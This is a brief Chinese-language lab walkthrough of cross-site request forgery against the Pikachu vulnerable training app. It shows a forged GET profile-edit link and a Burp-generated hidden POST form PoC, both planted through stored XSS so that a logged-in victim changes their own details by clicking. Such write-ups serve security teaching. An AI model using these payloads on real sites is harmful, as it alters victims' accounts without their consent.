CSRF
0x00 跨站请求伪造
Cross-site request forgery 简称为“CSRF”,在CSRF的攻击场景中攻击者会伪造一个请求(这个请求一般是一个链接),然后欺骗目标用户进行点击,用户一旦点击了这个请求,整个 攻击就完成了。所以CSRF攻击也成为"one click"攻击。很多人搞不清楚CSRF的概念,甚至有时候会将其和XSS混淆,更有甚者会将其和越权问题混为一谈,这都是对原理没搞清楚导致的。
攻击者:
allen---->123456
被攻击者:
kobe---->123456
0x01 CSRF(get) login
前期埋点
1、攻击者登录后获取修改信息的链接
http://XXXXX/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=435434553&phonenum=136sad&add=4354343&email=345343&submit=submit
2、将链接通过存储型XSS存入网页中
猎物上钩
1、受害者登录页面
2、浏览时发现攻击者埋的点,好奇心驱使他去点击
3、结果信息被修改
0x02 CSRF(post) login
埋点
1、攻击者登录后通过存储型XSS埋点
<a href="http://XXXXX/csrf/pk_csrf.html">post</a>
pk_csrf.html
内容:<html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://XXXXXX/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST"> <input type="hidden" name="sex" value="4354aa553" /> <input type="hidden" name="phonenum" value="136sad" /> <input type="hidden" name="add" value="435aaa3" /> <input type="hidden" name="email" value="34aa43" /> <input type="hidden" name="submit" value="suaait" /> <input type="submit" value="Submit request" /> </form> </body> </html>
上钩
1、受害者登录页面
2、浏览时发现攻击者埋的点,好奇心驱使他去点击
3、结果信息被修改